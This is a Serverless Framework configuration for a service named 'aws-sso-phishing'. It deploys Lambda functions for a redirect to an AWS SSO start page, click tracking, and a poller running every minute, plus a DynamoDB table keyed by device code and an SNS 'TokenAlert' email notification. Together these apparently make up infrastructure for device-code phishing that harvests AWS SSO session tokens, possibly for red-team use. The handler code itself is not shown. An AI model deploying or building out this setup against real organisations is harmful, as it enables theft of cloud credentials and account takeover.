# Welcome to Serverless!
#
# This file is the main config file for your service.
# It's very minimal at this point and uses default values.
# You can always add more config options for more control.
# We've included some commented out config examples here.
# Just uncomment any of them to get that config option.
#
# For full config options, check the docs:
#    docs.serverless.com
#
# Happy Coding!

service: aws-sso-phishing
# app and org for use with dashboard.serverless.com
app: aws-sso-phishing
#org: your-org-name

# You can pin your service to only deploy with a specific Serverless version
# Check out our docs for more details
frameworkVersion: '2'

provider:
  name: aws
  runtime: python3.8
  lambdaHashingVersion: 20201221

  iam:
    role:
      statements:
        - Effect: "Allow"
          Action:
            - "dynamodb:PutItem"
            - "dynamodb:GetItem"
            - "dynamodb:Scan"
          Resource:
            - "*"
custom: 
  accountId: ${file(./aws.js):getAccountId}
  region: ${opt:region, self:provider.region}
  notificationEmail: ${file(./config.js):notificationEmail} 
  scripts:
    hooks:
      'deploy:finalize': 'aws sns subscribe --topic-arn  arn:aws:sns:${self:custom.region}:${self:custom.accountId}:TokenAlert --protocol email --notification-endpoint ${self:custom.notificationEmail} --region ${self:custom.region}'
                                             
package:
  individually: true

plugins:
  - serverless-plugin-scripts

functions:

  poller:
    handler: functions/poller/handler.main
    environment:
      REGION: "us-west-2"
    package:
      exclude:
        - ./**
      include:
        - functions/poller/handler.py
    events:
      - schedule:
        rate: rate(1 minutes)

  urlRedirect:
    handler: functions/urlRedirect/handler.main
    environment:
      START_URL: "https://ruse.awsapps.com/start"
      REGION: "us-west-2"
    package:
      exclude:
        - ./**
      include:
        - functions/urlRedirect/handler.py
    events:
      - http: get redirect/



  getClicks:
    handler: functions/getClicks/handler.main
    package:
      exclude:
        - ./**
      include:
        - functions/getClicks/handler.py
    events:
      - http: get getClicks/



resources: # CloudFormation template syntax from here on.
  Resources:
    TokenAlert:
      Type: AWS::SNS::Topic
      Properties:
        TopicName: TokenAlert

    # Create DynamoDB
    usersTable:
      Type: AWS::DynamoDB::Table
      Properties:
        TableName: sessionTable
        AttributeDefinitions:
          - AttributeName: deviceCode
            AttributeType: S
        KeySchema:
          - AttributeName: deviceCode
            KeyType: HASH
        ProvisionedThroughput:
          ReadCapacityUnits: 1
          WriteCapacityUnits: 1


#    The following are a few example events you can configure
#    NOTE: Please make sure to change your handler code to work with those events
#    Check the event documentation for details
#    events:
#      - httpApi:
#          path: /users/create
#          method: get
#      - websocket: $connect
#      - s3: ${env:BUCKET}
#      - schedule: rate(10 minutes)
#      - sns: greeter-topic
#      - stream: arn:aws:dynamodb:region:XXXXXX:table/foo/stream/1970-01-01T00:00:00.000
#      - iot:
#          sql: "SELECT * FROM 'some_topic'"
#      - cloudwatchEvent:
#          event:
#            source:
#              - "aws.ec2"
#            detail-type:
#              - "EC2 Instance State-change Notification"
#            detail:
#              state:
#                - pending


